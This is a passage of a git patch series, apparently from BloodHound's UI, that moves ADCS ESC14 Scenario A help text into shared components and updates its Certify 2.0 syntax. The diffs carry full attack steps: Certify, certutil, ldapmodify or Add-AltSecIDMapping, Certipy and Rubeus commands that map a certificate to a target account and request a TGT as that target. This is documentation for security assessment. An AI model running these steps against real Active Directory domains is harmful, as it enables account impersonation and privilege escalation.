openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - Step 3: Add certificate mapping on target - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' attribute - of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\\nchangetype: modify\\nadd: altSecurityIdentities\\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - Step 4: Authenticate as target - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate and the - IP of a DC: - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - Step 5: Remove certificate mapping on target (clean-up) - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping string from - the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\\nchangetype: modify\\ndelete: altSecurityIdentities\\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WindowsAbuse.tsx index 634e0ebf142..d3f701497a1 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/WindowsAbuse.tsx @@ -16,7 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; -import CodeController from '../CodeController/CodeController'; +import { AdcsEsc14ScenarioAWindows } from '../AdcsEsc14ScenarioA'; import { EdgeInfoProps } from '../index'; const WindowsAbuse: FC = () => { @@ -33,110 +33,8 @@ const WindowsAbuse: FC = () => { {' '} edge for more details. - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target referring - to a certificate in the attacker's possession, and then use this certificate to authenticate as the - target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry (UPN)
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the certificate - typically must be of a computer. By default, the ADCS certificate template Computer (Machine){' '} - meets these requirements and grants Domain Computers enrollment rights. The target can still be a - user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - Step 1: Obtain certificate - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable and - cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does - not have their mail or dNSHostName attribute set, which is required by the certificate template. The - mail attribute can be set on both user and computer objects but the dNSHostName attribute can only be - set on computer objects. Computers have validated write permission to their own dNSHostName attribute by - default, but neither users nor computers can write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the certificate - as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - Step 2: Get certificate mapping identifier - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate public key using certutil: - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - Step 3: Add certificate mapping on target - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - Verify the that the mapping was added using Get-AltSecIDMapping: - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - Step 4: Authenticate as target - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target identity, - and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - Step 5: Remove certificate mapping on target (clean-up) - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate mapping - string from the 'altSecurityIdentities' attribute of the target principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + + ); }; From 7910c2458b8bce39b8d9cf8447fd14b5cb25621b Mon Sep 17 00:00:00 2001 From: JonasBK Date: Fri, 25 Jul 2025 16:01:15 +0200 Subject: [PATCH 6/9] prepare-codereview --- .../HelpTexts/WriteAltSecurityIdentities/WindowsAbuse.tsx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WindowsAbuse.tsx index d8ce3b76226..a1e3d32c57d 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteAltSecurityIdentities/WindowsAbuse.tsx @@ -16,8 +16,8 @@ import { Typography } from '@mui/material'; import { FC } from 'react'; -import { EdgeInfoProps } from '../index'; import { AdcsEsc14ScenarioAWindows } from '../AdcsEsc14ScenarioA'; +import { EdgeInfoProps } from '../index'; const WindowsAbuse: FC = () => { return ( From b853575951b73399a2ea8a1949fe2a6b3cf471b5 Mon Sep 17 00:00:00 2001 From: JonasBK Date: Tue, 29 Jul 2025 13:12:03 +0200 Subject: [PATCH 7/9] update abuse info to Certify 2.0 --- .../AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx index 9248fde5bc1..a75ba20b0b5 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx @@ -156,21 +156,13 @@ export const AdcsEsc14ScenarioAWindows: FC = () => { Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: + computer, or enrolling a new certificate as a computer using Certify (2.0): { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + 'Certify.exe request --ca:ca01.forestroot.com\\Forestroot-CA01-CA --template:Machine --machine --output-pem' } - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable and - cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does - not have their mail or dNSHostName attribute set, which is required by the certificate template. The - mail attribute can be set on both user and computer objects but the dNSHostName attribute can only be - set on computer objects. Computers have validated write permission to their own dNSHostName attribute by - default, but neither users nor computers can write to their own mail attribute by default. - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the certificate as a PFX file: From 8a8cfaddc335cf38a6648bd0ba1e829f607ae993 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jonas=20B=C3=BClow=20Knudsen?= <12843299+JonasBK@users.noreply.github.com> Date: Tue, 29 Jul 2025 13:35:46 +0200 Subject: [PATCH 8/9] Update AdcsEsc14ScenarioA.tsx --- .../HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx index a75ba20b0b5..1fe7dbb8d78 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx @@ -160,7 +160,7 @@ export const AdcsEsc14ScenarioAWindows: FC = () => { { - 'Certify.exe request --ca:ca01.forestroot.com\\Forestroot-CA01-CA --template:Machine --machine --output-pem' + 'Certify.exe request --ca ca01.forestroot.com\\Forestroot-CA01-CA --template Machine --machine --output-pem' } From b83e0da354288b46154263354c784d03a9634b59 Mon Sep 17 00:00:00 2001 From: JonasBK Date: Mon, 29 Sep 2025 18:20:32 +0200 Subject: [PATCH 9/9] ADCS ESC14 snippet --- .../AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx | 7 +++++++ .../HelpTexts/GenericAll/WindowsAbuse.tsx | 17 ++++------------- .../HelpTexts/GenericWrite/WindowsAbuse.tsx | 12 +++--------- .../components/HelpTexts/Owns/WindowsAbuse.tsx | 17 ++++------------- .../HelpTexts/WriteDacl/WindowsAbuse.tsx | 17 ++++------------- .../HelpTexts/WriteOwner/WindowsAbuse.tsx | 17 ++++------------- 6 files changed, 26 insertions(+), 61 deletions(-) diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx index 1fe7dbb8d78..de86b20c695 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx @@ -18,6 +18,13 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; import CodeController from '../CodeController/CodeController'; +export const AltSecIdenitiesBlurb = () => ( + + The permission also grants write access to the "altSecurityIdentities" attribute, which enables an ADCS ESC14 + Scenario A attack. + +); + export const AdcsEsc14ScenarioALinux: FC = () => ( <> ADCS ESC14 Scenario A diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx index 8dd6c43aaab..42d65c10af2 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx @@ -16,7 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; -import { AdcsEsc14ScenarioAWindows } from '../AdcsEsc14ScenarioA'; +import { AdcsEsc14ScenarioAWindows, AltSecIdenitiesBlurb } from '../AdcsEsc14ScenarioA'; import CodeController from '../CodeController/CodeController'; import { EdgeInfoProps } from '../index'; @@ -95,10 +95,7 @@ const WindowsAbuse: FC = equivalent to the "AddKeyCredentialLink" edge. - - The permission also grants write access to the "altSecurityIdentities" attribute, which enables - an ADCS ESC14 Scenario A attack. - + Alternatively, GenericAll enables {sourceName} to set a ServicePrincipalName (SPN) on the @@ -238,10 +235,7 @@ const WindowsAbuse: FC = Constrained Delegation attack. - - The permission also grants write access to the "altSecurityIdentities" attribute, which - enables an ADCS ESC14 Scenario A attack. - + Retrieve LAPS Password @@ -396,10 +390,7 @@ const WindowsAbuse: FC = Constrained Delegation attack. - - The permission also grants write access to the "altSecurityIdentities" attribute, which - enables an ADCS ESC14 Scenario A attack. - + Shadow Credentials attack diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/WindowsAbuse.tsx index 67af5a336f3..b7bd0b7c256 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/WindowsAbuse.tsx @@ -16,7 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; -import { AdcsEsc14ScenarioAWindows } from '../AdcsEsc14ScenarioA'; +import { AdcsEsc14ScenarioAWindows, AltSecIdenitiesBlurb } from '../AdcsEsc14ScenarioA'; import { EdgeInfoProps } from '../index'; const WindowsAbuse: FC = ({ sourceName, sourceType, targetName, targetType }) => { @@ -74,10 +74,7 @@ const WindowsAbuse: FC = ({ sourceName, sourceType, targetName, t on the object and authenticate as the principal using kerberos PKINIT. This is equivalent to the "AddKeyCredentialLink" edge. - - The permission also grants write access to the "altSecurityIdentities" attribute, which enables - an ADCS ESC14 Scenario A attack. - + Alternatively, GenericWrite enables {sourceName} to set a ServicePrincipalName (SPN) on the targeted user, which may be abused in a Targeted Kerberoast attack. @@ -186,10 +183,7 @@ const WindowsAbuse: FC = ({ sourceName, sourceType, targetName, t Constrained Delegation attack. - - The permission also grants write access to the "altSecurityIdentities" attribute, which enables - an ADCS ESC14 Scenario A attack. - + Shadow Credentials attack diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx index 60ab534a43a..07060fedaca 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx @@ -16,7 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; -import { AdcsEsc14ScenarioAWindows } from '../AdcsEsc14ScenarioA'; +import { AdcsEsc14ScenarioAWindows, AltSecIdenitiesBlurb } from '../AdcsEsc14ScenarioA'; import CodeController from '../CodeController/CodeController'; import { EdgeInfoProps } from '../index'; @@ -160,10 +160,7 @@ const WindowsAbuse: FC = equivalent to the "AddKeyCredentialLink" edge. - - The permission also grants write access to the "altSecurityIdentities" attribute, which enables - an ADCS ESC14 Scenario A attack. - + Alternatively, GenericAll enables {sourceName} to set a ServicePrincipalName (SPN) on the @@ -330,10 +327,7 @@ const WindowsAbuse: FC = Constrained Delegation attack. - - The permission also grants write access to the "altSecurityIdentities" attribute, which - enables an ADCS ESC14 Scenario A attack. - + Retrieve LAPS Password @@ -515,10 +509,7 @@ const WindowsAbuse: FC = Constrained Delegation attack. - - The permission also grants write access to the "altSecurityIdentities" attribute, which - enables an ADCS ESC14 Scenario A attack. - + Shadow Credentials attack diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx index b5025f0219d..976e5aa1dc6 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx @@ -16,7 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; -import { AdcsEsc14ScenarioAWindows } from '../AdcsEsc14ScenarioA'; +import { AdcsEsc14ScenarioAWindows, AltSecIdenitiesBlurb } from '../AdcsEsc14ScenarioA'; import CodeController from '../CodeController/CodeController'; import { EdgeInfoProps } from '../index'; @@ -141,10 +141,7 @@ const WindowsAbuse: FC = equivalent to the "AddKeyCredentialLink" edge. - - The permission also grants write access to the "altSecurityIdentities" attribute, which enables - an ADCS ESC14 Scenario A attack. - + Alternatively, GenericAll enables {sourceName} to set a ServicePrincipalName (SPN) on the @@ -306,10 +303,7 @@ const WindowsAbuse: FC = Constrained Delegation attack. - - The permission also grants write access to the "altSecurityIdentities" attribute, which - enables an ADCS ESC14 Scenario A attack. - + Retrieve LAPS Password @@ -486,10 +480,7 @@ const WindowsAbuse: FC = Constrained Delegation attack. - - The permission also grants write access to the "altSecurityIdentities" attribute, which - enables an ADCS ESC14 Scenario A attack. - + Shadow Credentials attack diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx index f8cb4aecdb7..11fa60387e5 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx @@ -16,7 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; -import { AdcsEsc14ScenarioAWindows } from '../AdcsEsc14ScenarioA'; +import { AdcsEsc14ScenarioAWindows, AltSecIdenitiesBlurb } from '../AdcsEsc14ScenarioA'; import CodeController from '../CodeController/CodeController'; import { EdgeInfoProps } from '../index'; @@ -192,10 +192,7 @@ const WindowsAbuse: FC = equivalent to the "AddKeyCredentialLink" edge. - - The permission also grants write access to the "altSecurityIdentities" attribute, which enables - an ADCS ESC14 Scenario A attack. - + Alternatively, GenericAll enables {sourceName} to set a ServicePrincipalName (SPN) on the @@ -380,10 +377,7 @@ const WindowsAbuse: FC = Constrained Delegation attack. - - The permission also grants write access to the "altSecurityIdentities" attribute, which - enables an ADCS ESC14 Scenario A attack. - + Retrieve LAPS Password @@ -584,10 +578,7 @@ const WindowsAbuse: FC = Constrained Delegation attack. - - The permission also grants write access to the "altSecurityIdentities" attribute, which - enables an ADCS ESC14 Scenario A attack. - + Shadow Credentials attack